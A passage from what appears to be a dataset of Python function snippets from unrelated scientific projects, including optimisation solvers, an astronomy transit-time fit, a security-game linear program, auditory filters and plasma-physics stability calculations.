'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n itst = self.iteration_stats(self.k, frcxd)\n self.itstat.append(itst)\n self.display_status(fmtstr, itst)\n self.timer.start(['solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Call callback function if defined\n if self.opt['Callback'] is not None:\n if self.opt['Callback'](self):\n break\n\n # Stop if residual-based stopping tolerances reached\n if not self.opt['FastSolve']:\n if frcxd < adapt_tol:\n break\n\n # Increment iteration count\n self.k += 1\n\n # Record solve time\n self.timer.stop(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Print final separator string if Verbose option enabled\n self.display_end(nsep)\n\n return self.getmin()", "def LeastSquareParametersFit(self,params0,inclination_data=None):\n\t\tnpl = self.Observations.nplanets\n\t\tif len(params0.reshape(-1)) == npl * 5:\n\t\t\tcoplanar = True\n\t\telif len(params0.reshape(-1)) == npl * 7:\n\t\t\tcoplanar = False\n\t\telse:\n\t\t\tprint(\"Shape of initial parameter does not match what is required for the number of planets!\")\n\t\t\traise\n\t\t\t\n\t\ttarget_data = np.array([])\n\t\terrors = np.array([])\n\t\t\n\t\tfor time,err in zip(self.Observations.transit_times,self.Observations.transit_uncertainties):\n\t\t\ttarget_data = np.append(target_data,time)\n\t\t\terrors = np.append(errors,err)\n\t\t\n\t\ttFinal = self.Observations.tFinal() + np.max(self.Observations.PeriodEstimates)\n\t\t\n\t\tdef objectivefn(x):\n\t\t\t\n\t\t\tif coplanar:\n\t\t\t\ttransits,success = self.MCMC_CoplanarParam_TransitTimes(x,tFinal)\n\t\t\telse:\n\t\t\t\ttransits,success = self.MCMC_Param_TransitTimes(x,tFinal)\n\t\t\tif\tinclination_data:\n\t\t\t\t\tassert not coplanar, \"Inclination data should not be include for coplanar fits\"\n\t\t\t\t\tcosi = np.abs( np.cos( x.reshape(-1,7)[:,4] ) )\n\t\t\t\t\tcosi0 = inclination_data[0]\n\t\t\t\t\tcosi_err = inclination_data[0]\n\t\t\t\t\tinc_chi2 = (cosi - cosi0) / cosi_err\n\t\t\t\n\t\t\tanswer = np.array([],dtype=float)\n\t\t\tfor i,t in enumerate(transits):\n\t\t\t\ttnums = self.Observations.transit_numbers[i]\n\t\t\t\ttry:\n\t\t\t\t\tanswer = np.append( answer,np.array(t[tnums]) )\n\t\t\t\texcept:\n\t\t\t\t\treturn -np.inf * np.ones(len(target_data))\n\t\t\t#\n\t\t\ttry:\n\t\t\t\tttvchi2 = (answer - target_data)/errors\n\t\t\texcept:\n\t\t\t\treturn -np.inf * np.ones(len(target_data))\n\t\t\t\n\t\t\tif inclination_data:\n\t\t\t\treturn np.append(ttvchi2,inc_chi2)\n\t\t\telse:\n\t\t\t\treturn ttvchi2\n\t\t\n\t\treturn leastsq(objectivefn, params0,full_output=1)", "def __Opt_value_depends_on_another_correct(self):\n strTestName = 'Test of value propagation onto optional parameters'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Reference parameter #1')\n RxCSObject.paramAddMan('parameter2', 'Reference parameter #2')\n\n RxCSObject.paramAddOpt('optpar1', 'Optional parameter #1', default='$$parameter1')\n RxCSObject.paramType('optpar1', int)\n RxCSObject.paramHE('optpar1', 4)\n RxCSObject.paramLE('optpar1', 4)\n\n RxCSObject.paramAddOpt('optpar2', 'Optional parameter #1', default='$$parameter2')\n RxCSObject.paramType('optpar2', int)\n RxCSObject.paramHE('optpar2', 1)\n RxCSObject.paramLE('optpar2', 1)\n \n RxCSObject.parameter1 = 4\n RxCSObject.parameter2 = 1\n \n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def anisotropy_solution(r, **kwargs):\n return 1", "def _orb_fit_calc(multi_paths: List[MultiplePaths], params, preread_ifgs=None) -> None:\n if not params[cf.ORBITAL_FIT]:\n log.info('Orbital correction not required!')\n print('Orbital correction not required!')\n return\n log.info('Calculating orbital correction')\n\n ifg_paths = [p.sampled_path for p in multi_paths]\n if preread_ifgs: # don't check except for mpi tests\n # perform some general error/sanity checks\n log.debug('Checking Orbital error correction status')\n if mpiops.run_once(shared.check_correction_status, ifg_paths, ifc.PYRATE_ORBITAL_ERROR):\n log.debug('Orbital error correction not required as all ifgs are already corrected!')\n return # return if True condition returned\n\n if params[cf.ORBITAL_FIT_METHOD] == 1:\n prcs_ifgs = mpiops.array_split(ifg_paths)\n orbital.remove_orbital_error(prcs_ifgs, params, preread_ifgs)\n else:\n # Here we do all the multilooking in one process, but in memory\n # can use multiple processes if we write data to disc during\n # remove_orbital_error step\n # A performance comparison should be made for saving multilooked\n # files on disc vs in memory single process multilooking\n if mpiops.rank == MASTER_PROCESS:\n headers = [find_header(p, params) for p in multi_paths]\n orbital.remove_orbital_error(ifg_paths, params, headers, preread_ifgs=preread_ifgs)\n mpiops.comm.barrier()\n log.debug('Finished Orbital error correction')", "def prepare(self) -> None:\n\n \"\"\"\n Objective function\n Coefficient -2 means that we solve maximization problem (multiple all \n value to -1) and also there are left coverage area and right coverage \n area for each station (2* cov)\n \"\"\"\n\n f = [-2 * self.cov[i] for i in range(self.get_column_num)]\n self._f = np.array(f)\n\n \"\"\" Inequality Constraints\"\"\"\n ineq_cost = [self.cost[i] for i in range(self.get_column_num)]\n self._ineq_constraints = np.array(ineq_cost)\n self._b = np.array(self.cost_limit)\n\n \"\"\" \n There is no equality constraints. \n self._eq_constraints is empty\n self._beq is empty\n \"\"\"", "def solve_traj(self, init_joint, final_joint, potential_goal_states, coeffs={}, object_pos=[0, 0.2, 0.83]):\n self.scene.robot.SetDOFValues(init_joint, self.scene.manipulator.GetArmIndices())\n\n _, default_traj = self.get_default_traj(\n init_joint, final_joint, self.n_pred_timesteps, potential_goal_states)\n self.scene.robot.SetDOFValues(init_joint, self.scene.manipulator.GetArmIndices())\n\n request = req_util.create_empty_request(\n self.n_pred_timesteps, final_joint, self.scene.manipulator_name,potential_goal_states)\n if \"distance\" in coeffs:\n req_util.add_distance_cost(request, self.complete_pred_traj_means_expanded,\n self.complete_pred_traj_vars_expanded, coeffs[\"distance\"], self.n_human_joints, self.scene.all_links)\n if \"distanceBaseline\" in coeffs:\n req_util.add_distance_baseline_cost(request, self.head_pos, self.torso_pos, self.feet_pos, self.scene.all_links, self.n_pred_timesteps, coeffs[\"distanceBaseline\"])\n \n if \"visibilityBaseline\" in coeffs:\n req_util.add_visibility_baseline_cost(request, self.head_pos, object_pos, self.scene.eef_link_name, self.n_pred_timesteps, coeffs[\"visibilityBaseline\"])\n\n if \"legibilityBaseline\" in coeffs:\n req_util.add_legibility_baseline_cost(\n request, coeffs[\"legibilityBaseline\"], self.scene.eef_link_name)\n if \"collision\" in coeffs:\n req_util.add_collision_cost(\n request, coeffs[\"collision\"][\"cost\"], coeffs[\"collision\"][\"dist_pen\"])\n if \"nominal\" in coeffs:\n req_util.add_optimal_trajectory_cost(\n request, default_traj, self.scene.eef_link_name, self.n_pred_timesteps, coeffs[\"nominal\"])\n if \"regularize\" in coeffs:\n req_util.add_regularize_cost(\n request, coeffs[\"regularize\"], self.scene.eef_link_name)\n if \"smoothing\" in coeffs:\n req_util.add_smoothing_cost(\n request, coeffs[\"smoothing\"][\"cost\"], coeffs[\"smoothing\"][\"type\"])\n if \"velocity\" in coeffs:\n req_util.add_velocity_cost(request, self.complete_pred_traj_means_expanded,\n self.complete_pred_traj_vars_expanded, coeffs[\"velocity\"], self.n_human_joints, self.scene.all_links)\n if \"visibility\" in coeffs:\n head_pred_traj_mean, head_pred_traj_var = traj_utils.create_human_head_means_vars(\n self.complete_pred_traj_means_expanded, self.complete_pred_traj_vars_expanded)\n req_util.add_visibility_cost(request, head_pred_traj_mean, head_pred_traj_var,\n coeffs[\"visibility\"], object_pos, self.scene.eef_link_name)\n if \"legibility\" in coeffs:\n req_util.add_legibility_cost(\n request, coeffs[\"legibility\"], self.scene.eef_link_name)\n \n if \"joint_vel\" in coeffs:\n req_util.add_joint_vel_cost(request, coeffs[\"joint_vel\"])\n\n result = self.optimize_problem(request)\n eef_traj = self.scene.follow_trajectory(np.array(result.GetTraj()))\n return result, eef_traj", "def solvePostDualEllipsoid(targetNum, defenders, dRewards, dPenalties, dCosts, aTypes, aRewards, aPenalties, q, maxIterations=5000):\n #\n # NEEDS ATTACKER AVG PER ATTACKER\n #\n \"\"\"Contains as many dummy targets as defenders, for defenders and attackers\"\"\"\n \"\"\"This problem is the dual of the primal above, and is solved using the ellipsoid method.\"\"\"\n # Add extra dummy targets\n _dRewards = copy.deepcopy(dRewards)\n _dPenalties = copy.deepcopy(dPenalties)\n _dCosts = copy.deepcopy(dCosts)\n _aRewards = copy.deepcopy(aRewards)\n _aPenalties = copy.deepcopy(aPenalties)\n for m in defenders:\n for defenderCount in defenders:\n _dRewards[m].append(0)\n _dPenalties[m].append(0)\n _dCosts[m].append(0)\n for lam in aTypes:\n _aRewards[lam].append(0)\n _aPenalties[lam].append(0)\n targetNumWithDummies = len(_dRewards[0])\n targetRange = list(range(targetNumWithDummies))\n\n # This is so we can reconstruct s later\n constraintMap = {}\n\n # Get the suggestions that occur with no overlap\n overlapPlacements = getPlacements(defenders, targetNumWithDummies)\n placements = list(filter(lambda x: len(set(x)) == len(x), overlapPlacements))\n s = [(sd,sa) for sd in placements for sa in targetRange]\n\n # Generate the keys\n aKeys = [(t,tPrime,lam) for t in targetRange for tPrime in targetRange for lam in aTypes]\n bKeys = [(t,tPrime,d) for t in targetRange for tPrime in targetRange for d in defenders]\n\n # Get a random subset of the placements\n subsetCount = int(len(placements) * 0.001)\n if subsetCount == 0:\n subsetCount = len(placements) // 4\n subsetS = random.choices(s, k=subsetCount)\n\n # Create the model\n relaxedModel = Model('relaxedModel')\n # Create the variables\n g = relaxedModel.continuous_var_dict(keys=aTypes, lb=-1000, ub=1000, name=\"g\") # unbounded\n a = relaxedModel.continuous_var_dict(keys=aKeys, lb=0, ub=1000, name=\"a\") # No upper bound\n b = relaxedModel.continuous_var_dict(keys=bKeys, lb=0, ub=1000, name=\"b\") # No upper bound\n # objective function:\n objectiveFunction = sum([g[lam] for lam in aTypes])\n # Initial constraints\n initialConstraints = []\n for sd,sa in subsetS:\n for lam in aTypes:\n constraint = sum([(aUtility(sd,tPrime,lam,_aPenalties,_aRewards) - aUtility(sd,sa,lam,_aPenalties,_aRewards)) * a[sa,tPrime,lam] for tPrime in targetRange]) + \\\n q[lam] * sum([(utilityM(tPrime,sd,sa,d,_dRewards,_dPenalties,_dCosts) - utilityM(sd[d],sd,sa,d,_dRewards,_dPenalties,_dCosts)) * b[sd[d],tPrime,d] for d in defenders for tPrime in targetRange]) + \\\n g[lam] \\\n >= q[lam] * defenderSocialUtility(sd,sa,defenders,_dRewards,_dCosts,_dPenalties)\n initialConstraints.append(constraint)\n constraintMap[constraint] = (sd,sa,lam)\n\n dualConstraints = relaxedModel.add_constraints(initialConstraints)\n\n # Solve the dual using column generation\n for _ in range(maxIterations):\n #print(f\"ITERATION: {_}\", flush=True)\n\n relaxedModel.minimize(objectiveFunction)\n relaxedModel.solve() # Alpha and Beta have values for each instance of target and attacker\n #print(f\"Utility on iteration {_} = {relaxedModel.solution.get_objective_value()}\", flush=True)\n\n # For every lam,t0, split (9) into two subproblems and solve each.\n violatedConstraints = False\n signalsToBeAdded = []\n for lam in aTypes:\n for t0 in targetRange:\n # Subproblem 1\n edges = {}\n # Graph weights with normal defenders\n for d in defenders:\n edges[f\"d_{d}\"] = {}\n for t in targetRange:\n if t == t0:\n weightValue = 10000000\n else:\n weightValue = (-q[lam]) * _dCosts[d][t] \\\n + q[lam] * (_dRewards[d][t0] + _dCosts[d][t0] - _dPenalties[d][t0] - _dCosts[d][t]) * float(b[t,t0,d]) \\\n + q[lam] * (sum([(_dCosts[d][tPrime] - _dCosts[d][t]) * float(b[t,tPrime,d]) for tPrime in targetRange if tPrime != t0])) \\\n + (_aPenalties[lam][t] - _aRewards[lam][t0]) * float(a[t0,t,lam])\n edges[f\"d_{d}\"][f\"t_{t}\"] = {\"weight\": weightValue}\n # Graph weights with added defenders\n for d in range(len(defenders), targetNumWithDummies):\n edges[f\"ed_{d}\"] = {}\n for t in targetRange:\n weightValue = (_aRewards[lam][t] - _aRewards[lam][t0]) * float(a[t0,t,lam])\n edges[f\"ed_{d}\"][f\"t_{t}\"] = {\"weight\": weightValue}\n\n # Solve the problem\n G = nx.from_dict_of_dicts(edges)\n matchings = nx.algorithms.bipartite.minimum_weight_full_matching(G)\n newPlacement = [0] * len(defenders)\n for k,v in matchings.items():\n if k.startswith(\"d_\"):\n defender = int(k.split(\"_\")[1])\n target = int(v.split(\"_\")[1])\n newPlacement[defender] = target\n\n # Check the value of this s using (10) -- if negative, add s to\n # the subset of solutions.\n value = sum([(aUtility(newPlacement,tPrime,lam,_aPenalties,_aRewards) - aUtility(newPlacement,t0,lam,_aPenalties,_aRewards)) * float(a[t0,tPrime,lam]) for tPrime in targetRange])\\\n + q[lam] * sum([(utilityM(tPrime,newPlacement,t0,d,_dRewards,_dPenalties,_dCosts) - utilityM(newPlacement[d],newPlacement,t0,d,_dRewards,_dPenalties,_dCosts)) * float(b[newPlacement[d],tPrime,d]) for d in defenders for tPrime in targetRange])\\\n - (q[lam] * defenderSocialUtility(newPlacement,t0,defenders,_dRewards,_dCosts,_dPenalties)) + float(g[lam])\n\n if value < EPSILON:\n signal = (newPlacement,t0)\n if signal not in signalsToBeAdded:\n violatedConstraints = True\n signalsToBeAdded.append(signal)\n\n # Subproblem 2\n # Fix each possible defender that coveres t0. For each of these, find\n # the best matching\n for d0 in defenders:\n edges = {}\n # Graph weights with normal defenders (minus d0 and t0)\n for d in defenders:\n if d != d0:\n edges[f\"d_{d}\"] = {}\n for t in targetRange:\n if t != t0:\n weightValue = (_aPenalties[lam][t] - _aPenalties[lam][t0]) * float(a[t0,t,lam]) \\\n + q[lam] * (sum([(_dCosts[d][tPrime] - _dCosts[d][t]) * float(b[t,tPrime,d]) for tPrime in targetRange])) \\\n - (q[lam] * _dCosts[d][t])\n edges[f\"d_{d}\"][f\"t_{t}\"] = {\"weight\": weightValue}\n # Graph weights with added defenders (minus t0)\n for d in range(len(defenders), targetNumWithDummies):\n edges[f\"ed_{d}\"] = {}\n for t in targetRange:\n if t != t0:\n weightValue = (_aRewards[lam][t] - _aPenalties[lam][t0]) * float(a[t0,t,lam])\n edges[f\"ed_{d}\"][f\"t_{t}\"] = {\"weight\": weightValue}\n\n # Solve the problem\n G = nx.from_dict_of_dicts(edges)\n matchings = nx.algorithms.bipartite.minimum_weight_full_matching(G)\n newPlacement = [0] * len(defenders)\n for k,v in matchings.items():\n if k.startswith(\"d_\"):\n defender = int(k.split(\"_\")[1])\n target = int(v.split(\"_\")[1])\n newPlacement[defender] = target\n newPlacement[d0] = t0\n\n # Check the value of this s using (9) -- if negative, add s to\n # the subset of solutions.\n value = sum([(aUtility(newPlacement,tPrime,lam,_aPenalties,_aRewards) - aUtility(newPlacement,t0,lam,_aPenalties,_aRewards)) * float(a[t0,tPrime,lam]) for tPrime in targetRange])\\\n + q[lam] * sum([(utilityM(tPrime,newPlacement,t0,d,_dRewards,_dPenalties,_dCosts) - utilityM(newPlacement[d],newPlacement,t0,d,_dRewards,_dPenalties,_dCosts)) * float(b[newPlacement[d],tPrime,d]) for d in defenders for tPrime in targetRange])\\\n - (q[lam] * defenderSocialUtility(newPlacement,t0,defenders,_dRewards,_dCosts,_dPenalties)) + float(g[lam])\n\n if value < EPSILON:\n signal = (newPlacement,t0)\n if signal not in signalsToBeAdded:\n violatedConstraints = True\n signalsToBeAdded.append(signal)\n\n # Now that we have checked all the violated constraints, either return\n # the solution ( get the dual values) or recompute the optimal value of\n # the dual with additional constraints\n newConstraints = []\n for sd,sa in signalsToBeAdded:\n for lam in aTypes:\n newConstraint = sum([(aUtility(sd,tPrime,lam,_aPenalties,_aRewards) - aUtility(sd,sa,lam,_aPenalties,_aRewards)) * a[sa,tPrime,lam] for tPrime in targetRange]) + \\\n q[lam] * sum([(utilityM(tPrime,sd,sa,d,_dRewards,_dPenalties,_dCosts) - utilityM(sd[d],sd,sa,d,_dRewards,_dPenalties,_dCosts)) * b[sd[d],tPrime,d] for d in defenders for tPrime in targetRange]) + \\\n g[lam] \\\n >= q[lam] * defenderSocialUtility(sd,sa,defenders,_dRewards,_dCosts,_dPenalties)\n newConstraints.append(newConstraint)\n constraintMap[newConstraint] = (sd,sa,lam)\n relaxedModel.add_constraints(newConstraints)\n for signal in signalsToBeAdded:\n subsetS.append(signal)\n if not violatedConstraints:\n break\n # print(relaxedModel.dual_values(relaxedModel.iter_constraints()))\n utilityPerDefender = relaxedModel.solution.get_objective_value() / len(defenders)\n utilityPerAttacker = 0\n constraints = relaxedModel.iter_constraints()\n for constraint in constraints:\n sd, sa, lam = constraintMap[constraint]\n prob = relaxedModel.dual_values([constraint])[0]\n utilityPerAttacker += aUtility(sd,sa,lam,_aPenalties,_aRewards) * prob\n utilityPerAttacker /= len(aTypes)\n return utilityPerDefender, utilityPerAttacker, None#relaxedModel.dual_values(relaxedModel.iter_constraints())", "def _calculate_filter_parameters(self):\n dt = 1.0 / self._fs\n nl_b_wq = 180.0\n nl_b_wp = 0.14\n nlin_bw = nl_b_wp * self._cf + nl_b_wq\n nlin_phi = 2.0 * numpy.pi * nlin_bw * dt\n nlin_theta = 2.0 * numpy.pi * self._cf * dt\n nlin_cos_theta = numpy.cos(nlin_theta)\n nlin_sin_theta = numpy.sin(nlin_theta)\n nlin_alpha = -numpy.exp(-nlin_phi) * nlin_cos_theta\n nlin_a1 = 2.0 * nlin_alpha\n nlin_a2 = numpy.exp(-2.0 * nlin_phi)\n nlin_z1 = complex(\n (1.0 + nlin_alpha * nlin_cos_theta), -\n (nlin_alpha * nlin_sin_theta))\n nlin_z2 = complex(\n (1.0 + nlin_a1 * nlin_cos_theta), -\n (nlin_a1 * nlin_sin_theta))\n nlin_z3 = complex(\n (nlin_a2 * numpy.cos(2.0 * nlin_theta)), -\n (nlin_a2 * numpy.sin(2.0 * nlin_theta)))\n nlin_tf = (nlin_z2 + nlin_z3) / nlin_z1\n nlin_b0 = abs(nlin_tf)\n nlin_b1 = nlin_alpha * nlin_b0\n\n lin_b_wq = 235.0\n lin_b_wp = 0.2\n lin_bw = lin_b_wp * self._cf + lin_b_wq\n lin_phi = 2.0 * numpy.pi * lin_bw * dt\n lin_c_fp = 0.62\n lin_c_fq = 266.0\n lin_cf = lin_c_fp * self._cf + lin_c_fq\n lin_theta = 2.0 * numpy.pi * lin_cf * dt\n lin_cos_theta = numpy.cos(lin_theta)\n lin_sin_theta = numpy.sin(lin_theta)\n lin_alpha = -numpy.exp(-lin_phi) * lin_cos_theta\n lin_a1 = 2.0 * lin_alpha\n lin_a2 = numpy.exp(-2.0 * lin_phi)\n lin_z1 = complex(\n (1.0 + lin_alpha * lin_cos_theta), -\n (lin_alpha * lin_sin_theta))\n lin_z2 = complex(\n (1.0 + lin_a1 * lin_cos_theta), -\n (lin_a1 * lin_sin_theta))\n lin_z3 = complex(\n (lin_a2 * numpy.cos(2.0 * lin_theta)), -\n (lin_a2 * numpy.sin(2.0 * lin_theta)))\n lin_tf = (lin_z2 + lin_z3) / lin_z1\n lin_b0 = abs(lin_tf)\n lin_b1 = lin_alpha * lin_b0\n\n return [lin_a1, lin_a2, lin_b0, lin_b1, nlin_a1, nlin_a2, nlin_b0,\n nlin_b1]", "def mercier(self):\n\n # See Overleaf note \"Mercier criterion near the magnetic axis- detailed notes\".\n # See also \"20200604-02 Checking sign in Mercier DGeod near axis.docx\"\n\n # Shorthand:\n d_l_d_phi = self.d_l_d_phi\n B0 = self.B0\n G0 = self.G0\n p2 = self.p2\n etabar = self.etabar\n curvature = self.curvature\n sigma = self.sigma\n iotaN = self.iotaN\n iota = self.iota\n pi = np.pi\n\n #integrand = d_l_d_phi * (Y1c * Y1c + X1c * (X1c + Y1s)) / (Y1c * Y1c + (X1c + Y1s) * (X1c + Y1s))\n integrand = d_l_d_phi * (etabar*etabar*etabar*etabar + curvature*curvature*curvature*curvature*sigma*sigma + etabar*etabar*curvature*curvature) \\\n / (etabar*etabar*etabar*etabar + curvature*curvature*curvature*curvature*(1+sigma*sigma) + 2*etabar*etabar*curvature*curvature)\n\n integral = np.sum(integrand) * self.d_phi * self.nfp * 2 * pi / self.axis_length\n\n #DGeod_times_r2 = -(2 * sG * spsi * mu0 * mu0 * p2 * p2 * G0 * G0 * G0 * G0 * etabar * etabar &\n self.DGeod_times_r2 = -(2 * mu0 * mu0 * p2 * p2 * G0 * G0 * G0 * G0 * etabar * etabar \\\n / (pi * pi * pi * B0 * B0 * B0 * B0 * B0 * B0 * B0 * B0 * B0 * B0 * iotaN * iotaN)) \\\n * integral\n\n self.d2_volume_d_psi2 = 4*pi*pi*abs(G0)/(B0*B0*B0)*(3*etabar*etabar - 4*self.B20_mean/B0 + 2 * (self.G2 + iota * self.I2)/G0)\n\n self.DWell_times_r2 = (mu0 * p2 * abs(G0) / (8 * pi * pi * pi * pi * B0 * B0 * B0)) * \\\n (self.d2_volume_d_psi2 - 8 * pi * pi * mu0 * p2 * abs(G0) / (B0 * B0 * B0 * B0 * B0))\n\n self.DMerc_times_r2 = self.DWell_times_r2 + self.DGeod_times_r2", "def minimize(self):\n self.normalize()\n p0s = self.spacedvals(method='random')\n if self.n_spots > 1:\n opts = self.multifit(p0s)\n else:\n opts = self.singlefit(p0s)\n self.yf = [self.solve(theta) for theta in opts]\n self.bestps = opts\n return opts", "def solve_environment(self):\n \n #The first problem formulation\n #K kinds of towers\n #See more details about problem formulation in the writeup \n \n #Get a full matrix of the concatenated coverage matrices for \n #each tower type. THis new matrix has dimensions:\n #(Ntowers) x (sum(potential sites)), where the sum o=is over all tower types\n coverage = np.hstack(i for i in self.coverage_matrices)\n print coverage\n print coverage.shape \n \n #Diagonal matrix of the values of each target\n #(for the scenarios where we don't care about maximizing covered value,\n #target_values is just all ones, so this is just the identity matrix)\n V = np.diag(self.target_values)\n \n #If doing scenario where we want to fortify weakest link, only makes\n #sense if all targets are equal value:\n if self.objective_type == 'min_entries':\n V = np.eye(len(self.target_values))\n\n #Get the matrix of coverage values / expected value saved:\n C = np.dot(V,coverage)\n print 'V', V\n print 'coverage', coverage\n print 'C', C\n \n \n #Since not gauranteed to reach global optimum on any particular initialization,\n #run a few times and take the best result.\n #Just define \"best result\" as the result which had the most overall \n #\"converged\" x, combined over all tower kinds. \n# for j in xrange(self.N_random_starts_max):\n \n \n a = 2. #1.\n tau = 1e-4\n N = sum(i for i in self.N_tower_sites)\n w = np.zeros(N)\n ones = np.ones(N)\n p = 1. #the exponents power when doing he exponent method:\n \n for i in xrange(self.N_reweighting_iterations_max):\n #The concatenated vector of occupancies: Concatenated over all\n #of the kinds of towers.\n x = cvx.Variable(N)\n \n #Different objective functions depending on which optimization problem.\n #These are defined in the scenarios in the main function.\n if self.objective_type == 'min_entries':\n operation = cvx.min_entries\n elif self.objective_type == 'sum_entries':\n operation = cvx.sum_entries\n else:\n raise Exception('must specify valid objective_type')\n \n #Objective function includes penalty term for non-binary x values\n if self.penalty_type == 'reweighted_L1':\n #objective = cvx.Maximize(t - x.T*w)\n objective = cvx.Maximize(operation(C*x - x.T*w))\n\n\n #Main constraints on 0<=x<=1\n constraints = [0<=x, x<=1]\n \n \n #And then for each kind of tower, append the constraint that there\n #be exactly N_i towers, or <= quota (depending on constraint type)\n if self.constraints__type == 'fixed_N_towers' or self.constraints__type == 'tower_quotas':\n for tk in xrange(self.N_tower_kinds):\n before_sum = np.concatenate(([0],np.cumsum(self.N_tower_sites)))[tk]\n print before_sum\n print before_sum + self.N_tower_sites[tk]\n if self.constraints__type == 'fixed_N_towers':\n constraints.append(cvx.sum_entries(\n x[before_sum : before_sum + self.N_tower_sites[tk]]\n )==self.N_towers[tk])\n elif self.constraints__type == 'tower_quotas':\n constraints.append(cvx.sum_entries(\n x[before_sum : before_sum + self.N_tower_sites[tk]]\n )<=self.budget__tower_quotas[tk])\n print x[before_sum : before_sum + self.N_tower_sites[tk]]\n \n elif self.constraints__type == 'total_cost':\n costs = np.hstack([np.repeat(self.budget__tower_unit_costs[tk],self.N_tower_sites[tk]) for tk in xrange(self.N_tower_kinds)])\n constraints.append(cvx.sum_entries(costs * x) <= self.budget__total_cost) \n \n \n \n\n\n \n \n print 'penalty_type', self.penalty_type\n print 'objective_type', self.objective_type\n print 'constraints__type', self.constraints__type\n print 'budget__tower_quotas', self.budget__tower_quotas\n print 'operation', operation\n print 'objective', objective\n print 'constraints', constraints\n cvx.Problem(objective, constraints).solve(verbose=self.VERBOSE)\n x = np.array(x.value).flatten()\n print 'x', x\n w = a/(tau+np.abs(x))\n p += 1.\n plt.figure(figsize=(5,5))\n plt.plot(x,marker='o')\n plt.savefig('histrograms_{}.png'.format(i))\n print \n \n \n \n \n #From the solution x, get the coordinates of those tower sites where we\n #really do want to place a tower\n #use = np.isclose(x,1.)\n for tk in xrange(self.N_tower_kinds):\n before_sum = np.concatenate(([0],np.cumsum(self.N_tower_sites)))[tk]\n y = x[before_sum : before_sum + self.N_tower_sites[tk]]\n inds = np.argsort(y)\n s = y[inds]\n use = np.where(s>.5)[0]\n print inds\n print s\n print use \n if self.constraints__type == 'fixed_N_towers':\n if len(use) != self.N_towers[tk]:\n print 'Solution did not converge properly. Choosing the K best towers.'\n print self.N_towers[tk], len(use)\n # use = use[-self.N_towers[tk]:]\n use = inds[-self.N_towers[tk]:]\n elif self.constraints__type == 'tower_quotas':\n pass #Just use the towers thresholded at > .5\n print use\n \n \n self.coordinates__solved_towers.append([self.coordinates__tower_sites[tk][mm] for mm in inds[use]])", "def _bowl_params(self):\n self.vars['bowl_strength'] = self.bowl.strength + \\\n self.vars['beta_min_offset']\n self.vars['q_init'] = self.vars['bowl_strength']\n if self.vars['bowl_strength'] <= self.vars['beta_min_offset']:\n print(\n f\"Bowl overflow -- Set to the minimum value : {self.vars['beta_min_offset']}\")\n # raise ValueError(\"Bowl overflow... strength lower than set tolerance. Modify the tolerance or fix the bug!\")\n self.vars['bowl_strength'] = self.vars['beta_min_offset']\n if self.vars['bowl_strength'] > self.vars['q_max']:\n self.vars['bowl_strength'] = self.vars['q_max']\n\n self.vars['zeta_bowl'] = self.toNeural(self.bowl.center)\n print(f\"Value for Q set to {self.vars['bowl_strength']}\")", "def _UpdateCriteria(self):\n grad = self.traj.grad[-1]\n disp = self.traj.coords[-1] - self.traj.coords[-2]\n self.delta_e = self.traj.energy[-1] - self.traj.energy[-2]\n self.grad_max = numpy.amax(grad)\n self.disp_max = numpy.amax(disp)\n self.grad_rms = math.sqrt(numpy.mean(grad**2))\n self.disp_rms = math.sqrt(numpy.mean(disp**2))", "def doParametersOfInterest(self):\n \n self.modelBuilder.doVar('expr::cosW(\"0.87681811112\",)')\n self.modelBuilder.doVar('expr::sinW(\"0.48082221247\",)')\n self.modelBuilder.doVar('expr::mZ(\"91.2\",)')\n self.modelBuilder.doVar('expr::Lambda1(\"100.0\",)')\n self.modelBuilder.doVar('expr::e2(\"0.0917\",)')\n self.modelBuilder.doVar('expr::gs2(\"1.533\",)')\n\n # EFT Higgs basis couplings\n\n self.modelBuilder.doVar('cZ[0,-1,1]') \n self.modelBuilder.doVar(\"cZZ[0,-2,2]\") \n self.modelBuilder.doVar(\"cZZt[0,-2,2]\") \n self.modelBuilder.doVar(\"cZB[0,-6,6]\") \n\n poi='cZ,cZZ,cZZt,cZB'\n\n # Amplitude couplings from EFT couplings \n\n self.modelBuilder.doVar('expr::a1(\"@0+1\",cZ)') # (\"2*(@0+1)\",cZ) in AN/Paper but a1 = 1 for signal model and width calculation\n self.modelBuilder.doVar('expr::a2(\"-1*@0*(@1/(2*pow(@2,2)*pow(@3,2)))\",cZZ,e2,sinW,cosW)')\n self.modelBuilder.doVar('expr::a3(\"-1*@0*(@1/(2*pow(@2,2)*pow(@3,2)))\",cZZt,e2,sinW,cosW)')\n self.modelBuilder.doVar('expr::k1(\"@0*(@1*pow(@2,2)/(pow(@3,2)*pow(@4,2)))\",cZB,e2,Lambda1,sinW,mZ)')\n self.modelBuilder.doVar('expr::k1L1(\"@0/pow(@1,2)\",k1,Lambda1)')\n\n ###### gamma_H ########\n\n # SMEFT relationships for VV couplings (Expressed using amplitude couplings)\n\n self.modelBuilder.doVar('expr::kappa(\"1.0\",)')\n self.modelBuilder.doVar('expr::kappa_tilde(\"0.0\",)') \n\n self.modelBuilder.doVar('expr::a1_WW(\"@0\",a1)')\n self.modelBuilder.doVar('expr::a2_WW(\"@0*@0*@1\",cosW,a2)')\n self.modelBuilder.doVar('expr::a3_WW(\"@0*@0*@1\",cosW,a3)')\n self.modelBuilder.doVar('expr::k1_WW(\"(@2 / (@0*@0 - @1*@1) - 2*@1*@1*@3*@4*@4 /(@5*@5*(@0*@0 - @1*@1)))\",cosW,sinW,k1,a2,Lambda1,mZ)')\n self.modelBuilder.doVar('expr::k2_k1(\"2*@0*@1*@2/(@0*@0 - @1*@1)\",cosW,sinW,k1)')\n self.modelBuilder.doVar('expr::k2_a2(\"-2*@0*@1*@3*@4*@4/((@2*@2)*(@0*@0 - @1*@1))\",cosW,sinW,mZ,a2,Lambda1)')\n self.modelBuilder.doVar('expr::k2(\"@0 + @1\",k2_k1,k2_a2)')\n\n # Determine gamma_H from VV couplings\n\n zz_expr = '\"4*(@0*@0/4. + 0.1695*@3*@3 + 0.09076*@1*@1 + 0.03809*@2*@2 + 0.8095*@0*@3/2. + 0.5046*@0*@1/2. + 0.2092*@1*@3 + 0.1023*@4*@4 + 0.1901*@0*@4/2. + 0.07429*@3*@4 + 0.04710*@1*@4) \",a1,a2,a3,k1,k2'\n ww_expr = 